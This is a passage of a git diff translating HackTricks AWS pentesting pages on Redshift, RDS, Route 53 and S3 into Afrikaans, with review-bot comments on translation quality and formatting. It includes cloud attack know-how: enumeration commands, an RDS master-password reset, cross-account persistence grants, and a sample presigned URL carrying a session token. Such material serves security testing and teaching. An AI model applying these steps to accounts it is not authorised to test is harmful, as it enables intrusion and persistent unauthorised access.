Dit moet afgelaai en geregistreer word by jou HSM-klient, en aan die regte HSM-partisie toegeken word. -You must then configure Redshift with the following details of your HSM client: the HSM IP address, the HSM partition name, the HSM partition password, and the public HSM server certificate, which is encrypted by CloudHSM using an internal master key. Once this information has been provided, Redshift will confirm and verify that it can connect and access development partition. +Jy moet dan Redshift konfigureer met die volgende besonderhede van jou HSM-klient: die HSM IP-adres, die HSM-partisie naam, die HSM-partisie wagwoord, en die publieke HSM bedienersertifikaat, wat deur CloudHSM met 'n interne meester sleutel versleuteld is. 
Sodra hierdie inligting verskaf is, sal Redshift bevestig en verifieer dat dit kan aansluit en toegang tot die ontwikkelingspartisie kan verkry. -If your internal security policies or governance controls dictate that you must apply key rotation, then this is possible with Redshift enabling you to rotate encryption keys for encrypted clusters, however, you do need to be aware that during the key rotation process, it will make a cluster unavailable for a very short period of time, and so it's best to only rotate keys as and when you need to, or if you feel they may have been compromised. +As jou interne sekuriteitsbeleide of bestuurbeheer bepaal dat jy sleutelrotasie moet toepas, dan is dit moontlik met Redshift wat jou in staat stel om versleuteling sleutels vir versleutelde klusters te roteer, maar jy moet bewus wees dat tydens die sleutelrotasie proses, dit 'n kluster vir 'n baie kort tydperk van tyd onbeskikbaar sal maak, en dit is dus die beste om sleutels slegs te roteer soos en wanneer jy moet, of as jy voel dat hulle moontlik gecompromitteer is. -During the rotation, Redshift will rotate the CEK for your cluster and for any backups of that cluster. It will rotate a DEK for the cluster but it's not possible to rotate a DEK for the snapshots stored in S3 that have been encrypted using the DEK. It will put the cluster into a state of 'rotating keys' until the process is completed when the status will return to 'available'. +Tydens die rotasie, sal Redshift die CEK vir jou kluster en vir enige rugsteun van daardie kluster roteer. Dit sal 'n DEK vir die kluster roteer, maar dit is nie moontlik om 'n DEK vir die snappings wat in S3 gestoor is en met die DEK versleuteld is, te roteer nie. Dit sal die kluster in 'n toestand van 'sleutels roteer' plaas totdat die proses voltooi is wanneer die status terugkeer na 'beskikbaar'.
### Enumeration - ```bash # Get clusters aws redshift describe-clusters @@ -82,22 +81,17 @@ aws redshift describe-scheduled-actions # The redshift instance must be publicly available (not by default), the sg need to allow inbounds connections to the port and you need creds psql -h redshift-cluster-1.sdflju3jdfkfg.us-east-1.redshift.amazonaws.com -U admin -d dev -p 5439 ``` - ## Privesc {{#ref}} ../aws-privilege-escalation/aws-redshift-privesc.md {{#endref}} -## Persistence +## Persistensie -The following actions allow to grant access to other AWS accounts to the cluster: +Die volgende aksies stel in staat om toegang tot ander AWS-rekeninge tot die kluster te verleen: - [authorize-endpoint-access](https://docs.aws.amazon.com/cli/latest/reference/redshift/authorize-endpoint-access.html) - [authorize-snapshot-access](https://docs.aws.amazon.com/cli/latest/reference/redshift/authorize-snapshot-access.html) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md index 473369403..cbaa367b4 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md 
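Review bot: the new Afrikaans in the Redshift key-hierarchy and CloudHSM hunk mixes Dutch conjugations and spellings into Afrikaans and should be corrected before merge: `versleutelt dan die DEK` and `te versleutelen` (Afrikaans: `versleutel`), `elke datablock` (`datablok`), `moontlik gecompromitteer` (`gekompromitteer`), and `die snappings wat in S3 gestoor is` for snapshots, where the RDS hunk in this same patch keeps `snapshots`; settle on one term. `apart in Redshift gestoor van die kluster` reads better as `apart van die kluster in Redshift gestoor`. The Trusted Advisor sentence about S3 bucket logging sits inside the Redshift encryption section in both the old and the new text; it is off-topic there and worth moving while the paragraph is being rewritten anyway.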
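Review bot: hunk `@@ -82,22 +81,17 @@` on the Redshift page is mostly whitespace churn unrelated to translation: the blank line after `### Enumeration`, the blank line between the closing fence and `## Privesc`, the blank line before the `{{#include ...}}` banner and the four trailing blank lines are all deleted, and the same pattern repeats in every file of this patch. Keep the original spacing (at least one blank line after each closing fence) so the next heading is not glued to the code block and so reviewers see only translated lines. In the translated sentence `Die volgende aksies stel in staat om toegang tot ander AWS-rekeninge tot die kluster te verleen` the object is missing: `stel jou in staat om toegang tot die kluster aan ander AWS-rekeninge te verleen`.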
@@ -2,76 +2,75 @@ {{#include ../../../banners/hacktricks-training.md}} -## Basic Information +## Basiese Inligting -The **Relational Database Service (RDS)** offered by AWS is designed to streamline the deployment, operation, and scaling of a **relational database in the cloud**. This service offers the advantages of cost efficiency and scalability while automating labor-intensive tasks like hardware provisioning, database configuration, patching, and backups. +Die **Relational Database Service (RDS)** wat deur AWS aangebied word, is ontwerp om die ontplooiing, werking en skaal van 'n **relationele databasis in die wolk** te stroomlyn. Hierdie diens bied die voordele van kostedoeltreffendheid en skaalbaarheid terwyl dit arbeidsintensiewe take soos hardeware voorsiening, databasis konfigurasie, patching en rugsteun outomatiseer. -AWS RDS supports various widely-used relational database engines including MySQL, PostgreSQL, MariaDB, Oracle Database, Microsoft SQL Server, and Amazon Aurora, with compatibility for both MySQL and PostgreSQL. +AWS RDS ondersteun verskeie algemeen gebruikte relationele databasis enjin, insluitend MySQL, PostgreSQL, MariaDB, Oracle Database, Microsoft SQL Server, en Amazon Aurora, met kompatibiliteit vir beide MySQL en PostgreSQL. -Key features of RDS include: +Belangrike kenmerke van RDS sluit in: -- **Management of database instances** is simplified. -- Creation of **read replicas** to enhance read performance. -- Configuration of **multi-Availability Zone (AZ) deployments** to ensure high availability and failover mechanisms. -- **Integration** with other AWS services, such as: - - AWS Identity and Access Management (**IAM**) for robust access control. - - AWS **CloudWatch** for comprehensive monitoring and metrics. - - AWS Key Management Service (**KMS**) for ensuring encryption at rest. +- **Bestuur van databasisinstansies** is vereenvoudig. +- Skep van **lees replika** om leesprestasie te verbeter. 
+- Konfigurasie van **multi-Beskikbaarheid Sone (AZ) ontplooiings** om hoĂ« beskikbaarheid en failover meganismes te verseker. +- **Integrasie** met ander AWS dienste, soos: +- AWS Identiteit en Toegang Bestuur (**IAM**) vir robuuste toegangbeheer. +- AWS **CloudWatch** vir omvattende monitering en metrieke. +- AWS Sleutelbestuurdiens (**KMS**) om versleuteling in rus te verseker. -## Credentials +## Kredensiale -When creating the DB cluster the master **username** can be configured (**`admin`** by default). To generate the password of this user you can: +Wanneer die DB-kluster geskep word, kan die meester **gebruikersnaam** geconfigureer word (**`admin`** is die standaard). Om die wagwoord van hierdie gebruiker te genereer, kan jy: -- **Indicate** a **password** yourself -- Tell RDS to **auto generate** it -- Tell RDS to manage it in **AWS Secret Manager** encrypted with a KMS key +- **Aangee** 'n **wagwoord** self +- RDS sĂȘ om dit **outomaties te genereer** +- RDS sĂȘ om dit in **AWS Secret Manager** te bestuur wat met 'n KMS-sleutel versleuteld is
-### Authentication +### Verifikasie -There are 3 types of authentication options, but using the **master password is always allowed**: +Daar is 3 tipes verifikasie opsies, maar die gebruik van die **meester wagwoord is altyd toegelaat**:
-### Public Access & VPC +### Publieke Toegang & VPC -By default **no public access is granted** to the databases, however it **could be granted**. Therefore, by default only machines from the same VPC will be able to access it if the selected **security group** (are stored in EC2 SG)allows it. +Standaard **word geen publieke toegang toegestaan** tot die databasisse nie, maar dit **kan toegestaan word**. Daarom sal slegs masjiene van dieselfde VPC toegang hĂȘ as die geselekteerde **veiligheidsgroep** (wat in EC2 SG gestoor word) dit toelaat. -Instead of exposing a DB instance, it’s possible to create a **RDS Proxy** which **improves** the **scalability** & **availability** of the DB cluster. +In plaas daarvan om 'n DB-instansie bloot te stel, is dit moontlik om 'n **RDS Proxy** te skep wat die **skaalbaarheid** & **beskikbaarheid** van die DB-kluster **verbeter**. -Moreover, the **database port can be modified** also. +Boonop kan die **databasispoort ook gewysig word**. -### Encryption +### Versleuteling -**Encryption is enabled by default** using a AWS managed key (a CMK could be chosen instead). +**Versleuteling is standaard geaktiveer** met 'n AWS bestuurde sleutel (n CMK kan in plaas daarvan gekies word). -By enabling your encryption, you are enabling **encryption at rest for your storage, snapshots, read replicas and your back-ups**. Keys to manage this encryption can be issued by using **KMS**.\ -It's not possible to add this level of encryption after your database has been created. **It has to be done during its creation**. +Deur jou versleuteling te aktiveer, aktiveer jy **versleuteling in rus vir jou stoor, snapshots, lees replika en jou rugsteun**. Sleutels om hierdie versleuteling te bestuur kan uitgereik word deur **KMS**.\ +Dit is nie moontlik om hierdie vlak van versleuteling by te voeg nadat jou databasis geskep is nie. **Dit moet tydens die skepping gedoen word**. 
-However, there is a **workaround allowing you to encrypt an unencrypted database as follows**. You can create a snapshot of your unencrypted database, create an encrypted copy of that snapshot, use that encrypted snapshot to create a new database, and then, finally, your database would then be encrypted. +Daar is egter 'n **ompad wat jou toelaat om 'n nie-versleutelde databasis soos volg te versleutel**. Jy kan 'n snapshot van jou nie-versleutelde databasis skep, 'n versleutelde kopie van daardie snapshot skep, daardie versleutelde snapshot gebruik om 'n nuwe databasis te skep, en dan, uiteindelik, sou jou databasis dan versleuteld wees. -#### Transparent Data Encryption (TDE) +#### Deursigtige Data Versleuteling (TDE) -Alongside the encryption capabilities inherent to RDS at the application level, RDS also supports **additional platform-level encryption mechanisms** to safeguard data at rest. This includes **Transparent Data Encryption (TDE)** for Oracle and SQL Server. However, it's crucial to note that while TDE enhances security by encrypting data at rest, it may also **affect database performance**. This performance impact is especially noticeable when used in conjunction with MySQL cryptographic functions or Microsoft Transact-SQL cryptographic functions. +Saam met die versleuteling vermoĂ«ns wat inherent aan RDS op die toepassingsvlak is, ondersteun RDS ook **addisionele platform-vlak versleuteling meganismes** om data in rus te beskerm. Dit sluit **Deursigtige Data Versleuteling (TDE)** vir Oracle en SQL Server in. Dit is egter belangrik om op te let dat terwyl TDE sekuriteit verbeter deur data in rus te versleutel, dit ook **databasisprestasie kan beĂŻnvloed**. Hierdie prestasie-impak is veral merkbaar wanneer dit saam met MySQL-kryptografiese funksies of Microsoft Transact-SQL-kryptografiese funksies gebruik word. -To utilize TDE, certain preliminary steps are required: +Om TDE te gebruik, is sekere voorlopige stappe nodig: -1. 
**Option Group Association**: - - The database must be associated with an option group. Option groups serve as containers for settings and features, facilitating database management, including security enhancements. - - However, it's important to note that option groups are only available for specific database engines and versions. -2. **Inclusion of TDE in Option Group**: - - Once associated with an option group, the Oracle Transparent Data Encryption option needs to be included in that group. - - It's essential to recognize that once the TDE option is added to an option group, it becomes a permanent fixture and cannot be removed. -3. **TDE Encryption Modes**: - - TDE offers two distinct encryption modes: - - **TDE Tablespace Encryption**: This mode encrypts entire tables, providing a broader scope of data protection. - - **TDE Column Encryption**: This mode focuses on encrypting specific, individual elements within the database, allowing for more granular control over what data is encrypted. +1. **Opsie Groep Assosiasie**: +- Die databasis moet met 'n opsiegroep geassosieer word. Opsiegroepe dien as houers vir instellings en kenmerke, wat databasisbestuur vergemaklik, insluitend sekuriteitsverbeterings. +- Dit is egter belangrik om op te let dat opsiegroepe slegs beskikbaar is vir spesifieke databasis enjin en weergawes. +2. **Insluiting van TDE in Opsiegroep**: +- Sodra dit met 'n opsiegroep geassosieer is, moet die Oracle Deursigtige Data Versleuteling opsie in daardie groep ingesluit word. +- Dit is noodsaaklik om te erken dat sodra die TDE opsie by 'n opsiegroep gevoeg word, dit 'n permanente kenmerk word en nie verwyder kan word nie. +3. **TDE Versleuteling Modusse**: +- TDE bied twee uiteenlopende versleuteling modusse: +- **TDE Tabelruimte Versleuteling**: Hierdie modus versleutel hele tabelles, wat 'n breĂ«r omvang van databeskydding bied. 
+- **TDE Kolom Versleuteling**: Hierdie modus fokus op die versleuteling van spesifieke, individuele elemente binne die databasis, wat meer granulaire beheer oor wat data versleutel, moontlik maak. -Understanding these prerequisites and the operational intricacies of TDE is crucial for effectively implementing and managing encryption within RDS, ensuring both data security and compliance with necessary standards. - -### Enumeration +Om hierdie vereistes en die operasionele ingewikkeldhede van TDE te verstaan, is noodsaaklik vir effektiewe implementering en bestuur van versleuteling binne RDS, wat beide datasekuriteit en nakoming van nodige standaarde verseker. +### Enumerasie ```bash # Clusters info ## Get Endpoints, username, port, iam auth enabled, attached roles, SG @@ -106,41 +105,36 @@ aws rds describe-db-proxy-targets ## reset credentials of MasterUsername aws rds modify-db-instance --db-instance-identifier --master-user-password --apply-immediately ``` - -### Unauthenticated Access +### Ongeauthentiseerde Toegang {{#ref}} ../aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md {{#endref}} -### Privesc +### Privilege Escalation {{#ref}} ../aws-privilege-escalation/aws-rds-privesc.md {{#endref}} -### Post Exploitation +### Post Exploitatie {{#ref}} ../aws-post-exploitation/aws-rds-post-exploitation.md {{#endref}} -### Persistence +### Volharding {{#ref}} ../aws-persistence/aws-rds-persistence.md {{#endref}} -### SQL Injection +### SQL Inbraak -There are ways to access DynamoDB data with **SQL syntax**, therefore, typical **SQL injections are also possible**. +Daar is maniere om toegang tot DynamoDB-data te verkry met **SQL-sintaksis**, daarom is tipiese **SQL-inbrake ook moontlik**. {{#ref}} https://book.hacktricks.xyz/pentesting-web/sql-injection {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - 
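Review bot: the RDS hunk `@@ -2,76 +2,75 @@` flattens two nested lists, which changes how the page renders. The sub-items under `- **Integrasie** met ander AWS dienste, soos:` (`- AWS Identiteit en Toegang Bestuur`, `- AWS **CloudWatch**`, `- AWS Sleutelbestuurdiens`) lose their two-space indent and become siblings of the parent bullet, and the `- ` lines under `1. **Opsie Groep Assosiasie**:`, `2. **Insluiting van TDE in Opsiegroep**:` and `3. **TDE Versleuteling Modusse**:` lose their indent, so each group of sub-points renders as a separate top-level bullet list wedged between the numbered items. Restore the original indentation. Also fix in the same hunk: `(n CMK kan in plaas daarvan gekies word)` has lost its apostrophe (`'n CMK`); `hele tabelles` should be `hele tabelle`; `databeskydding` should be `databeskerming`; `beheer oor wat data versleutel` should be `beheer oor watter data versleutel word`; and `AWS Secret Manager`, carried over from the English, is `AWS Secrets Manager`. Finally, if `hoĂ«`, `sĂȘ` and `beĂŻnvloed` look like this in the committed file and not only in this diff view, the file was written with the wrong encoding; confirm it is UTF-8 (`hoë`, `sê`, `beïnvloed`).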
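Review bot: heading terminology in hunk `@@ -106,41 +105,36 @@` is inconsistent with the rest of the patch and these headings are the navigation anchors, so align them: `### Privesc` becomes the English `### Privilege Escalation` here but stays `### Privesc` in the Route 53 file, `### Persistence` becomes `### Volharding` here but `## Persistensie` on the Redshift page, and `### SQL Injection` becomes `### SQL Inbraak`, where `inbraak` means a break-in; keep `SQL Injection` (or `SQL-inspuiting`) as the established term. `Post Exploitatie` is a Dutch form; either translate fully (`Post-eksploitasie`) or keep the English `Post Exploitation`. The sentence `Daar is maniere om toegang tot DynamoDB-data te verkry met SQL-sintaksis` faithfully translates an English line that appears to be copy-pasted from the DynamoDB page; on an RDS page it should refer to the RDS engines listed at the top of the file, and since the line is being rewritten this is the moment to fix it.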
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md index c37002eb7..020cac016 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md @@ -4,16 +4,15 @@ ## Route 53 -Amazon Route 53 is a cloud **Domain Name System (DNS)** web service.\ -You can create https, http and tcp **health checks for web pages** via Route53. +Amazon Route 53 is 'n wolk **Domain Name System (DNS)** webdiens.\ +Jy kan https, http en tcp **gesondheidskontroles vir webbladsye** via Route53 skep. -### IP-based routing +### IP-gebaseerde roetering -This is useful to tune your DNS routing to make the best DNS routing decisions for your end users.\ -IP-based routing offers you the additional ability to **optimize routing based on specific knowledge of your customer base**. - -### Enumeration +Dit is nuttig om jou DNS-roetering aan te pas om die beste DNS-roeteringsbesluite vir jou eindgebruikers te neem.\ +IP-gebaseerde roetering bied jou die addisionele vermoĂ« om **roetering te optimaliseer op grond van spesifieke kennis van jou kliĂ«ntebasis**. +### Enumerasie ```bash aws route53 list-hosted-zones # Get domains aws route53 get-hosted-zone --id @@ -21,7 +20,6 @@ aws route53 list-resource-record-sets --hosted-zone-id # Get al aws route53 list-health-checks aws route53 list-traffic-policies ``` - ### Privesc {{#ref}} @@ -29,7 +27,3 @@ aws route53 list-traffic-policies {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md index 3133c0eac..5caeedfaa 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md 
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md 
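Review bot: in the Route 53 hunk `@@ -4,16 +4,15 @@` the blank line between the IP-based routing paragraph and `### Enumerasie` and the blank line between that heading and the bash fence are removed, and hunks `@@ -21,7 +20,6 @@` and `@@ -29,7 +27,3 @@` delete only blank lines; none of this is translation. Restore the spacing so the diff contains just the translated lines. The translation itself reads well (`gesondheidskontroles` for health checks, `IP-gebaseerde roetering`), but `### Privesc` is left untranslated here while the RDS file in this same patch renders it as `### Privilege Escalation`; use the same heading in both.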
@@ -4,144 +4,137 @@ ## S3 -Amazon S3 is a service that allows you **store big amounts of data**. +Amazon S3 is 'n diens wat jou toelaat om **groot hoeveelhede data te stoor**. -Amazon S3 provides multiple options to achieve the **protection** of data at REST. The options include **Permission** (Policy), **Encryption** (Client and Server Side), **Bucket Versioning** and **MFA** **based delete**. The **user can enable** any of these options to achieve data protection. **Data replication** is an internal facility by AWS where **S3 automatically replicates each object across all the Availability Zones** and the organization need not enable it in this case. +Amazon S3 bied verskeie opsies om die **beskerming** van data in rus te bereik. Die opsies sluit **Toestemming** (Beleid), **Enkripsie** (KliĂ«nt en Bediener-kant), **Emmerweergawe** en **MFA** **gebaseerde verwydering** in. Die **gebruiker kan enige van hierdie opsies aktiveer** om databesking te bereik. **Data-replikaasie** is 'n interne fasiliteit deur AWS waar **S3 outomaties elke objek oor al die Beschikbaarheidsone repliseer** en die organisasie hoef dit nie in hierdie geval te aktiveer nie. -With resource-based permissions, you can define permissions for sub-directories of your bucket separately. +Met hulpbron-gebaseerde toestemmings kan jy toestemmings vir sub-gidse van jou emmer apart definieer. -### Bucket Versioning and MFA based delete +### Emmerweergawe en MFA-gebaseerde verwydering -When bucket versioning is enabled, any action that tries to alter a file inside a file will generate a new version of the file, keeping also the previous content of the same. Therefore, it won't overwrite its content. +Wanneer emmerweergawe geaktiveer is, sal enige aksie wat probeer om 'n lĂȘer binne 'n lĂȘer te verander 'n nuwe weergawe van die lĂȘer genereer, terwyl dit ook die vorige inhoud van dieselfde behou. Daarom sal dit nie sy inhoud oorskryf nie. 
-Moreover, MFA based delete will prevent versions of file in the S3 bucket from being deleted and also Bucket Versioning from being disabled, so an attacker won't be able to alter these files. +Boonop sal MFA-gebaseerde verwydering verhinder dat weergawes van lĂȘers in die S3-emmer verwyder word en ook dat Emmerweergawe gedeaktiveer word, sodat 'n aanvaller nie in staat sal wees om hierdie lĂȘers te verander nie. -### S3 Access logs +### S3 Toegang logs -It's possible to **enable S3 access login** (which by default is disabled) to some bucket and save the logs in a different bucket to know who is accessing the bucket (both buckets must be in the same region). +Dit is moontlik om **S3 toegang aan te dui** (wat standaard gedeaktiveer is) vir 'n emmer en die logs in 'n ander emmer te stoor om te weet wie die emmer toegang (albei emmers moet in dieselfde streek wees). -### S3 Presigned URLs - -It's possible to generate a presigned URL that can usually be used to **access the specified file** in the bucket. A **presigned URL looks like this**: +### S3 Presigned URL's +Dit is moontlik om 'n presigned URL te genereer wat gewoonlik gebruik kan word om **toegang te verkry tot die gespesifiseerde lĂȘer** in die emmer. 
'n **presigned URL lyk soos volg**: ``` https://.s3.us-east-1.amazonaws.com/asd.txt?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAUUE8GZC4S5L3TY3P%2F20230227%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20230227T142551Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjELf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIBhQpdETJO3HKKDk2hjNIrPWwBE8gZaQccZFV3kCpPCWAiEAid3ueDtFFU%2FOQfUpvxYTGO%2BHoS4SWDMUrQAE0pIaB40qggMIYBAAGgwzMTgxNDIxMzg1NTMiDJLI5t7gr2EGxG1Y5CrfAioW0foHIQ074y4gvk0c%2B%2Fmqc7cNWb1njQslQkeePHkseJ3owzc%2FCwkgE0EuZTd4mw0aJciA2XIbJRCLPWTb%2FCBKPnIMJ5aBzIiA2ltsiUNQTTUxYmEgXZoJ6rFYgcodnmWW0Et4Xw59UlHnCDB2bLImxPprriyCzDDCD6nLyp3J8pFF1S8h3ZTJE7XguA8joMs4%2B2B1%2FeOZfuxXKyXPYSKQOOSbQiHUQc%2BFnOfwxleRL16prWk1t7TamvHR%2Bt3UgMn5QWzB3p8FgWwpJ6GjHLkYMJZ379tkimL1tJ7o%2BIod%2FMYrS7LDCifP9d%2FuYOhKWGhaakPuJKJh9fl%2B0vGl7kmApXigROxEWon6ms75laXebltsWwKcKuYca%2BUWu4jVJx%2BWUfI4ofoaGiCSaKALTqwu4QNBRT%2BMoK6h%2BQa7gN7JFGg322lkxRY53x27WMbUE4unn5EmI54T4dWt1%2Bg8ljDS%2BvKfBjqmAWRwuqyfwXa5YC3xxttOr3YVvR6%2BaXpzWtvNJQNnb6v0uI3%2BTtTexZkJpLQYqFcgZLQSxsXWSnf988qvASCIUhAzp2UnS1uqy7QjtD5T73zksYN2aesll7rvB80qIuujG6NOdHnRJ2M5%2FKXXNo1Yd15MtzPuSjRoSB9RSMon5jFu31OrQnA9eCUoawxbB0nHqwK8a43CKBZHhA8RoUAJW%2B48EuFsp3U%3D&X-Amz-Signature=3436e4139e84dbcf5e2e6086c0ebc92f4e1e9332b6fda24697bc339acbf2cdfa ``` - -A presigned URL can be **created from the cli using credentials of a principal with access to the object** (if the account you use doesn't have access, a shorter presigned URL will be created but it will be useless) - +'n Voorafondertekende URL kan **uit die cli geskep word met die kredensiale van 'n hoof met toegang tot die objek** (as die rekening wat jy gebruik nie toegang het nie, sal 'n korter voorafondertekende URL geskep word, maar dit sal nutteloos wees) ```bash - aws s3 presign --region 's3:///' +aws s3 presign --region 's3:///' ``` - > [!NOTE] -> The only required permission to generate a presigned URL is the permission being given, so 
for the previous command the only permission needed by the principal is `s3:GetObject` - -It's also possible to create presigned URLs with **other permissions**: +> Die enigste vereiste toestemming om 'n presigned URL te genereer, is die toestemming wat gegee word, so vir die vorige opdrag is die enigste toestemming wat deur die hoofpersoon benodig word `s3:GetObject` +Dit is ook moontlik om presigned URLs te skep met **ander toestemmings**: ```python import boto3 url = boto3.client('s3').generate_presigned_url( - ClientMethod='put_object', - Params={'Bucket': 'BUCKET_NAME', 'Key': 'OBJECT_KEY'}, - ExpiresIn=3600 +ClientMethod='put_object', +Params={'Bucket': 'BUCKET_NAME', 'Key': 'OBJECT_KEY'}, +ExpiresIn=3600 ) ``` +### S3 Enkripsiemeganismes -### S3 Encryption Mechanisms - -**DEK means Data Encryption Key** and is the key that is always generated and used to encrypt data. +**DEK beteken Data Enkripsiesleutel** en is die sleutel wat altyd gegenereer en gebruik word om data te enkripteer.
-Server-side encryption with S3 managed keys, SSE-S3 +Bediener-kant enkripsie met S3 bestuurde sleutels, SSE-S3 -This option requires minimal configuration and all management of encryption keys used are managed by AWS. All you need to do is to **upload your data and S3 will handle all other aspects**. Each bucket in a S3 account is assigned a bucket key. +Hierdie opsie vereis minimale konfigurasie en al die bestuur van enkripsiesleutels wat gebruik word, word deur AWS bestuur. Al wat jy hoef te doen is om **jou data op te laai en S3 sal al die ander aspekte hanteer**. Elke emmer in 'n S3-rekening word aan 'n emmersleutel toegeken. -- Encryption: - - Object Data + created plaintext DEK --> Encrypted data (stored inside S3) - - Created plaintext DEK + S3 Master Key --> Encrypted DEK (stored inside S3) and plain text is deleted from memory -- Decryption: - - Encrypted DEK + S3 Master Key --> Plaintext DEK - - Plaintext DEK + Encrypted data --> Object Data +- Enkripsie: +- Objektdata + geskepte platte DEK --> Geënkripteerde data (gestoor binne S3) +- Geskepte platte DEK + S3 Meestersleutel --> Geënkripteerde DEK (gestoor binne S3) en platte teks word uit geheue verwyder +- Dekripsie: +- Geënkripteerde DEK + S3 Meestersleutel --> Platte DEK +- Platte DEK + Geënkripteerde data --> Objektdata -Please, note that in this case **the key is managed by AWS** (rotation only every 3 years). If you use your own key you willbe able to rotate, disable and apply access control. +Neem asseblief kennis dat in hierdie geval **die sleutel deur AWS bestuur word** (rotasie slegs elke 3 jaar). As jy jou eie sleutel gebruik, sal jy in staat wees om te roteer, te deaktiveer en toegangbeheer toe te pas.
-Server-side encryption with KMS managed keys, SSE-KMS +Bediener-kant enkripsie met KMS bestuurde sleutels, SSE-KMS -This method allows S3 to use the key management service to generate your data encryption keys. KMS gives you a far greater flexibility of how your keys are managed. For example, you are able to disable, rotate, and apply access controls to the CMK, and order to against their usage using AWS Cloud Trail. +Hierdie metode laat S3 toe om die sleutelbestuursdiens te gebruik om jou data-enkripsiesleutels te genereer. KMS bied jou 'n baie groter buigsaamheid oor hoe jou sleutels bestuur word. Byvoorbeeld, jy kan die CMK deaktiveer, roteer en toegangbeheer toepas, en bestellings teen hul gebruik met AWS Cloud Trail. -- Encryption: - - S3 request data keys from KMS CMK - - KMS uses a CMK to generate the pair DEK plaintext and DEK encrypted and send them to S£ - - S3 uses the paintext key to encrypt the data, store the encrypted data and the encrypted key and deletes from memory the plain text key -- Decryption: - - S3 ask to KMS to decrypt the encrypted data key of the object - - KMS decrypt the data key with the CMK and send it back to S3 - - S3 decrypts the object data +- Enkripsie: +- S3 versoek data sleutels van KMS CMK +- KMS gebruik 'n CMK om die paar DEK platte teks en DEK geënkripteer te genereer en dit na S3 te stuur +- S3 gebruik die platte sleutel om die data te enkripteer, stoor die geënkripteerde data en die geënkripteerde sleutel en verwyder die platte sleutel uit geheue +- Dekripsie: +- S3 vra KMS om die geënkripteerde datasleutel van die objek te dekripteer +- KMS dekripteer die datasleutel met die CMK en stuur dit terug na S3 +- S3 dekripteer die objektdata
-Server-side encryption with customer provided keys, SSE-C +Bediener-kant enkripsie met kliënt verskaf sleutels, SSE-C -This option gives you the opportunity to provide your own master key that you may already be using outside of AWS. Your customer-provided key would then be sent with your data to S3, where S3 would then perform the encryption for you. +Hierdie opsie gee jou die geleentheid om jou eie meester sleutel te verskaf wat jy dalk reeds buite AWS gebruik. Jou kliënt-verskaf sleutel sal dan saam met jou data na S3 gestuur word, waar S3 dan die enkripsie vir jou sal uitvoer. -- Encryption: - - The user sends the object data + Customer key to S3 - - The customer key is used to encrypt the data and the encrypted data is stored - - a salted HMAC value of the customer key is stored also for future key validation - - the customer key is deleted from memory -- Decryption: - - The user send the customer key - - The key is validated against the HMAC value stored - - The customer provided key is then used to decrypt the data +- Enkripsie: +- Die gebruiker stuur die objektdata + Kliëntsleutel na S3 +- Die kliëntsleutel word gebruik om die data te enkripteer en die geënkripteerde data word gestoor +- 'n Gesoute HMAC-waarde van die kliëntsleutel word ook gestoor vir toekomstige sleutelvalidasie +- die kliëntsleutel word uit geheue verwyder +- Dekripsie: +- Die gebruiker stuur die kliëntsleutel +- Die sleutel word gevalideer teen die gestoor HMAC-waarde +- Die kliënt verskaf sleutel word dan gebruik om die data te dekripteer
-Client-side encryption with KMS, CSE-KMS +Kliënt-kant enkripsie met KMS, CSE-KMS -Similarly to SSE-KMS, this also uses the key management service to generate your data encryption keys. However, this time KMS is called upon via the client not S3. The encryption then takes place client-side and the encrypted data is then sent to S3 to be stored. +Soos met SSE-KMS, gebruik dit ook die sleutelbestuursdiens om jou data-enkripsiesleutels te genereer. Hierdie keer word KMS egter via die kliënt en nie S3 aangespreek nie. Die enkripsie vind dan kliënt-kant plaas en die geënkripteerde data word dan na S3 gestuur om gestoor te word. -- Encryption: - - Client request for a data key to KMS - - KMS returns the plaintext DEK and the encrypted DEK with the CMK - - Both keys are sent back - - The client then encrypts the data with the plaintext DEK and send to S3 the encrypted data + the encrypted DEK (which is saved as metadata of the encrypted data inside S3) -- Decryption: - - The encrypted data with the encrypted DEK is sent to the client - - The client asks KMS to decrypt the encrypted key using the CMK and KMS sends back the plaintext DEK - - The client can now decrypt the encrypted data +- Enkripsie: +- Kliënt versoek 'n datasleutel van KMS +- KMS stuur die platte DEK en die geënkripteerde DEK met die CMK terug +- Beide sleutels word teruggestuur +- Die kliënt enkripteer dan die data met die platte DEK en stuur die geënkripteerde data + die geënkripteerde DEK (wat as metadata van die geënkripteerde data binne S3 gestoor word) na S3 +- Dekripsie: +- Die geënkripteerde data met die geënkripteerde DEK word na die kliënt gestuur +- Die kliënt vra KMS om die geënkripteerde sleutel met die CMK te dekripteer en KMS stuur die platte DEK terug +- Die kliënt kan nou die geënkripteerde data dekripteer
